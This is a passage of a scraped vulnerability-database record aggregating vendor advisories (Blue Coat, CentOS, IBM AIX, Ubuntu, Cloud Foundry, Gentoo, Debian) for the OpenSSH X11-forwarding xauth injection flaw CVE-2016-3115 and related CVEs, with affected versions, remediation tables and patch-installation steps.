\n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n | 6.7 and later | Not vulnerable, fixed in 6.7.2.1. \n6.6 | Upgrade to 6.6.5.1. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n \n | 2.1 and later | Not vulnerable \n1.3 | Upgrade to 1.3.7.1. \n1.2 | Upgrade to later releases with fixes. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 6.1 | Upgrade to 6.1.23.1. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 1.1 | Upgrade to 1.1.2.1. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 4.2 | Upgrade to 4.2.10. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n | 1.6 and later | Not vulnerable, fixed in 1.6.1.1 \n1.5 | Upgrade to later releases with fixes. \n \n \n\n**PacketShaper (PS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 9.2 | Fixed in 9.2.13p7 \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n \n | 11.6 and later | Not vulnerable, fixed in 11.6.1.1 \n11.5 | Upgrade to 11.5.3.2. \n11.2, 11.3, 11.4 | Upgrade to later releases with fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 1.1 | Upgrade to 1.1.2.2. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1 \n10.1 | Upgrade to 10.1.4.2. \n \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 7.2 and later | Not vulnerable, fixed in 7.2.1 \n7.1 | Apply RPM patch from Blue Coat Support. \n7.0 | Upgrade to later releases with fixes. \n6.6 | Apply RPM patch from Blue Coat Support. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 \n \n | 3.10 and later | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.4.1. \n3.8, 3.8.4FC | Upgrade to later releases with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 11.0 | Not available at this time \n10.0 | Upgrade to later release with fixes. \n9.7 | Upgrade to later release with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION\n\nBlue Coat products do not enable or use all functionality within OpenSSH. The products listed below do not support X11 forwarding and are thus not known to be vulnerable. However, OpenSSH patches will be provided.\n\n * ASG\n * CAS\n * Director\n * MTD\n * MAA\n * MC\n * PacketShaper\n * PacketShaper S-Series\n * PolicyCenter S-Series\n * Reporter\n * Security Analytics\n * SSLV\n * XOS\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPolicyCenter \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n### ISSUES\n\nThis Security Advisory addresses a shell command restriction bypass vulnerability when X11 forwarding is enabled in OpenSSH server (CVE-2016-3115). Blue Coat products that include a vulnerable version of OpenSSH and use the affected functionality are vulnerable.\n\nWhen establishing an X11 forwarding session, the SSH client sends an X11 authentication credential to the SSH server. The credential consists of an authentication scheme and credential data. The SSH server passes the credential components as command line arguments to the xauth utility, which stores them in an X11 authorization file. Affected versions of OpenSSH do not sufficiently sanitize the credential components before invoking xauth with them. A remote attacker can exploit this vulnerability by acting as an SSH client and sending crafted credential components to inject arbitrary commands in xauth. The attacker can use xauth commands to read and overwrite arbitrary files, connect to local ports on the target, and perform attacks against xauth.\n\n**CVE-2016-3115** \n--- \n**Severity / CVSSv2** | Medium / 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N) \n**References** | SecurityFocus: BID [84314](<https://www.securityfocus.com/bid/84314>) / NVD: [CVE-2015-3115](<https://nvd.nist.gov/vuln/detail/CVE-2016-3115>) \n**Impact** | Security bypass \n**Description** | An authenticated remote attacker can exploit this vulnerability to bypass intended command restrictions enforced by a restricted shell or the target's SSH configuration. \n \n \n\n### REFERENCES\n\nOpenSSH security advisory - <https://www.openssh.com/txt/x11fwd.adv> \n \n\n\n### REVISION\n\n2020-04-21 Advisory status changes to Closed. \n2019-10-02 Web Isolation is not vulnerable. \n2018-07-01 A fix for PacketShaper 9.2 is available in 9.2.13p7. \n2018-04-22 PacketShaper S-Series 11.10 is not vulnerable. \n2017-11-06 ASG 6.7 is not vulnerable because a fix is available in 6.7.2.1. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-07-24 PacketShaper S-Series 11.9 is not vulnerable. \n2017-07-20 MC 1.10 is not vulnerable. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2017-06-05 PacketShaper S-Series 11.8 is not vulnerable. \n2017-05-29 SSLV 4.0 is not vulnerable. \n2017-05-18 CAS 2.1 is not vulnerable. \n2017-04-30 A fix for Director 6.1 is available in 6.1.23.1. \n2017-03-30 MC 1.9 is not vulnerable. \n2017-03-06 MC 1.8 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2016-12-04 PacketShaper S-Series 11.7 is not vulnerable. \n2016-12-04 SSLV 3.11 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-10-26 A fix for ASG is available in 6.6.5.1. A fix for MAA is available in 4.2.10. A fix for Reporter 10.1 is available in 10.1.4.2. A fix for MC 1.6 is available in 1.6.1.1. MC 1.7 is not vulnerable. A fix for MC 1.5 will not be provided. \n2016-08-12 A fix for CAS 1.3 is available in 1.3.7.1. Security Analytics 7.2 is not vulnerable. \n2016-08-10 A fix for SSLV 3.9 is available in 3.9.4.1. \n2016-06-30 PacketShaper S-Series 11.6 is not vulnerable. \n2016-06-24 A fix for PacketShaper S-Series is available in 11.5.3.2. A fix for PolicyCenter S-Series is available in 1.1.2.2. \n2016-06-16 PS S-Series 11.2, 11.3, 11.4, and 11.5 have a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack. PC S-Series 1.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. Fixes are not available at this time. \n2016-06-13 Fixes for ICSP, NNP, and NSP are available in 5.3.6. \n2016-05-26 Fixes are available for Security Analytics 6.6 and 7.1 through patch RPMs from Blue Coat Support. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-28 initial public release\n", "modified": "2020-04-21T22:19:53", "published": "2016-04-28T08:00:00", "id": "SMNTC-1361", "href": "", "type": "symantec", "title": "SA121 : OpenSSH Shell Command Restriction Bypass", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:28:43", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0466\n\n\nOpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. (CVE-2015-5600)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-March/033783.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-clients\nopenssh-ldap\nopenssh-server\npam_ssh_agent_auth\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0466.html", "edition": 3, "modified": "2016-03-21T22:18:29", "published": "2016-03-21T22:18:29", "href": "http://lists.centos.org/pipermail/centos-announce/2016-March/033783.html", "id": "CESA-2016:0466", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-12-20T18:28:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0465\n\n\nOpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH; the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-March/033784.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-clients\nopenssh-keycat\nopenssh-ldap\nopenssh-server\nopenssh-server-sysvinit\npam_ssh_agent_auth\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0465.html", "edition": 3, "modified": "2016-03-21T22:38:14", "published": "2016-03-21T22:38:14", "href": "http://lists.centos.org/pipermail/centos-announce/2016-March/033784.html", "id": "CESA-2016:0465", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "aix": [{"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue May 3 10:03:39 CDT 2016 \n|Updated: Fri May 13 09:51:05 CDT 2016 \n|Update: New iFixes now available. \n\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2016-3115 and\n CVE-2016-1908)\n \n \n===============================================================================\n\nSUMMARY:\n\n Vulnerabilities in OpenSSH affect AIX \n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2016-3115\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to\n execute arbitrary commands on the system, caused by improper\n validation of user-supplied X11 authentication credentials by the sshd\n server. By sending specially crafted X11 credential data, an attacker\n could exploit this vulnerability to inject xauth commands and execute\n arbitrary commands on the system with the privileges of the victim. \n CVSS Base Score: 8.8 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/111431 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n \n CVEID: CVE-2016-1908\n DESCRIPTION: OpenSSH could allow a remote authenticated attacker to bypass\n security restrictions, caused by the improper handling of errors when\n generating authentication cookies for untrusted X11 forwarding. An\n attacker could exploit this vulnerability to gain access to the target\n local X server. \n CVSS Base Score: 4.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/110030 for the\n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6201 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6201 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp and\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/openssh_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/openssh_fix8.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n releases.\n\n Note that the tar file contains Interim fixes that are based on\n OpenSSH version as given below - \n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n \n AIX OpenSSH fixes are cumulative, so installing the latest fixes\n will cover previously released AIX security bulletins for\n OpenSSH. \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n| 5.3, 6.1, 7.1, 7.2 IV84698m9b.160513.epkg.Z openssh.base(6.0.0.6110 version) key_w_fix\n| 5.3, 6.1, 7.1, 7.2 IV84698m9a.160513.epkg.Z openssh.base(6.0.0.6201 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z)\t Fileset Name(prereq for installation) KEY\n ----------------------------------------------------------------------------------------\n| 2.2.* IV84698m9b.160513.epkg.Z openssh.base(6.0.0.6110 version) key_w_fix\n| 2.2.* IV84698m9a.160513.epkg.Z openssh.base(6.0.0.6201 version) key_w_fix\n\n\n| The above fixes are cumulative and contain fixes for all\n| previously announced OpenSSH security vulnerabilities on\n| AIX.\n\n| The ssh connection hang is specifically seen in scenarios\n| when ssh is used with pseudo tty. The login will succeed\n| but later connections get hanged.\n\n Note - OpenSSH releases 6.0.0.6110 and 6.0.0.6201 are same\n except that 6.0.0.6201 is compiled with OpenSSL v1.0.1 and\n contains ECDSA key support. Refer to the fileset readme file for\n more details.\n \n Latest level of OpenSSH fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n OpenSSH 6.0.0.6201 version is also part of AIX Service pack: \n 6100-09-06-1543, that was released in Dec. 2015.\n \n To extract the fix from the tar file:\n\n tar xvf openssh_fix8.tar\n cd openssh_fix8\n\n Verify you have retrieved the fix intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n| 933ac42222856c63beae729fce8ea3f94a428904a622e5395e6df4dc2b8d41b2 IV84698m9b.160513.epkg.Z key_w_csum\n| 974370174695d0be3f65baa87be7bca6238d7d980531c21c50348c6f8ee25121 IV84698m9a.160513.epkg.Z key_w_csum\n \n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the integrity\n of the fixes. If the sums or signatures cannot be confirmed,\n contact IBM AIX Security at security-alert@austin.ibm.com and\n describe the discrepancy.\n \n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <ifix_file>.sig <ifix_file>\n\n \n B. FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n \n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database:\n https://exchange.xforce.ibmcloud.com/vulnerabilities/111431\n X-Force Vulnerability Database:\n https://exchange.xforce.ibmcloud.com/vulnerabilities/110030\n CVE-2016-3115:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3115\n CVE-2016-1908:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1908\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Tue May 3 10:03:39 CDT 2016 \n Updated: Tue May 10 11:23:23 CDT 2016\n Update: Temporarily removing fixes due to a potential hanging issue\n introduced by the fixes. Updated fixes will be live within 24 hours.\n Updated: Thu May 12 10:42:22 CDT 2016\n Update: Temporarily removing fixes due to a potential hanging issue\n introduced by the fixes. Updated fixes will be live on May 13.\n| Updated: Fri May 13 09:51:05 CDT 2016\n| Update: New iFixes now available.\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n", "edition": 5, "modified": "2016-05-13T09:51:05", "published": "2016-05-03T10:03:39", "id": "OPENSSH_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory8.asc", "title": "Vulnerabilities in OpenSSH affect AIX", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:33:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-1907", "CVE-2016-3115"], "description": "Shayan Sadigh discovered that OpenSSH incorrectly handled environment files \nwhen the UseLogin feature is enabled. A local attacker could use this issue \nto gain privileges. (CVE-2015-8325)\n\nBen Hawkes discovered that OpenSSH incorrectly handled certain network \ntraffic. A remote attacker could possibly use this issue to cause OpenSSH \nto crash, resulting in a denial of service. This issue only applied to \nUbuntu 15.10. (CVE-2016-1907)\n\nThomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 \nforwarding when the SECURITY extension is disabled. A connection configured \nas being untrusted could get switched to trusted in certain scenarios, \ncontrary to expectations. (CVE-2016-1908)\n\nIt was discovered that OpenSSH incorrectly handled certain X11 forwarding \ndata. A remote authenticated attacker could possibly use this issue to \nbypass certain intended command restrictions. (CVE-2016-3115)", "edition": 5, "modified": "2016-05-09T00:00:00", "published": "2016-05-09T00:00:00", "id": "USN-2966-1", "href": "https://ubuntu.com/security/notices/USN-2966-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:58", "bulletinFamily": "software", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-1907", "CVE-2016-3115"], "description": "USN-2966-1 OpenSSH vulnerabilities\n\n# \n\nLow\n\n# Vendor\n\nCanonical Ubuntu, openssh\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04 LTS \n\n# Description\n\nShayan Sadigh discovered that OpenSSH incorrectly handled environment files when the UseLogin feature is enabled. A local attacker could use this issue to gain privileges. ([CVE-2015-8325](<http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8325.html>))\n\nBen Hawkes discovered that OpenSSH incorrectly handled certain network traffic. A remote attacker could possibly use this issue to cause OpenSSH to crash, resulting in a denial of service. This issue only applied to Ubuntu 15.10. ([CVE-2016-1907](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1907.html>))\n\nThomas Hoger discovered that OpenSSH incorrectly handled untrusted X11 forwarding when the SECURITY extension is disabled. A connection configured as being untrusted could get switched to trusted in certain scenarios, contrary to expectations. ([CVE-2016-1908](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1908.html>))\n\nIt was discovered that OpenSSH incorrectly handled certain X11 forwarding data. A remote authenticated attacker could possibly use this issue to bypass certain intended command restrictions. ([CVE-2016-3115](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3115.html>))\n\n# Affected Products and Versions\n\n_Severity is low unless otherwise noted. \n_\n\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.56.0 \n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.12 AND other versions prior to 3232.4 are vulnerable \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.56.0 or later versions \n * The Cloud Foundry project recommends that Cloud Foundry upgrade BOSH stemcell 3146.x versions to 3146.12 OR other versions to 3232.4 \n\n# Credit\n\nBen Hawkes, Thomas Hoger, Shayan Sadigh\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-2966-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-8325.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1907.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1908.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3115.html>\n", "edition": 5, "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "CFOUNDRY:782597A83B98B15285C8A73B8555B7B2", "href": "https://www.cloudfoundry.org/blog/usn-2966-1/", "title": "USN-2966-1 OpenSSH vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-12-07T12:54:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858"], "edition": 1, "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nRemote attackers could cause Denial of Service and conduct user enumeration. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.3_p1-r7\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-18", "id": "GLSA-201612-18", "type": "gentoo", "title": "OpenSSH: Multiple vulnerabilities", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T01:03:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-1908", "CVE-2016-10708", "CVE-2016-10011", "CVE-2015-6564", "CVE-2016-10009", "CVE-2016-6515", "CVE-2015-5352", "CVE-2016-3115", "CVE-2017-15906", "CVE-2016-10012", "CVE-2015-6563"], "description": "Package : openssh\nVersion : 1:6.7p1-5+deb8u6\nCVE ID : CVE-2015-5352 CVE-2015-5600 CVE-2015-6563 CVE-2015-6564\n CVE-2016-1908 CVE-2016-3115 CVE-2016-6515 CVE-2016-10009\n CVE-2016-10011 CVE-2016-10012 CVE-2016-10708\n CVE-2017-15906\nDebian Bug : 790798 793616 795711 848716 848717\n\n\nSeveral vulnerabilities have been found in OpenSSH, a free implementation\nof the SSH protocol suite:\n\nCVE-2015-5352\n\n OpenSSH incorrectly verified time window deadlines for X connections.\n Remote attackers could take advantage of this flaw to bypass intended\n access restrictions. Reported by Jann Horn.\n\nCVE-2015-5600\n\n OpenSSH improperly restricted the processing of keyboard-interactive\n devices within a single connection, which could allow remote attackers\n to perform brute-force attacks or cause a denial of service, in a\n non-default configuration.\n\nCVE-2015-6563\n\n OpenSSH incorrectly handled usernames during PAM authentication. In\n conjunction with an additional flaw in the OpenSSH unprivileged child\n process, remote attackers could make use if this issue to perform user\n impersonation. Discovered by Moritz Jodeit.\n\nCVE-2015-6564\n\n Moritz Jodeit discovered a use-after-free flaw in PAM support in\n OpenSSH, that could be used by remote attackers to bypass\n authentication or possibly execute arbitrary code.\n\nCVE-2016-1908\n\n OpenSSH mishandled untrusted X11 forwarding when the X server disables\n the SECURITY extension. Untrusted connections could obtain trusted X11\n forwarding privileges. Reported by Thomas Hoger.\n\nCVE-2016-3115\n\n OpenSSH improperly handled X11 forwarding data related to\n authentication credentials. Remote authenticated users could make use\n of this flaw to bypass intended shell-command restrictions. Identified\n by github.com/tintinweb.\n\nCVE-2016-6515\n\n OpenSSH did not limit password lengths for password authentication.\n Remote attackers could make use of this flaw to cause a denial of\n service via long strings.\n\nCVE-2016-10009\n\n Jann Horn discovered an untrusted search path vulnerability in\n ssh-agent allowing remote attackers to execute arbitrary local\n PKCS#11 modules by leveraging control over a forwarded agent-socket.\n\nCVE-2016-10011\n\n Jann Horn discovered that OpenSSH did not properly consider the\n effects of realloc on buffer contents. This may allow local users to\n obtain sensitive private-key information by leveraging access to a\n privilege-separated child process.\n\nCVE-2016-10012\n\n Guido Vranken discovered that the OpenSSH shared memory manager\n did not ensure that a bounds check was enforced by all compilers,\n which could allow local users to gain privileges by leveraging access\n to a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\n NULL pointer dereference and daemon crash via an out-of-sequence\n NEWKEYS message.\n\nCVE-2017-15906\n\n Michal Zalewski reported that OpenSSH improperly prevent write\n operations in readonly mode, allowing attackers to create zero-length\n files.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:6.7p1-5+deb8u6.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-09-10T08:45:03", "published": "2018-09-10T08:45:03", "id": "DEBIAN:DLA-1500-1:E6BD7", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201809/msg00010.html", "title": 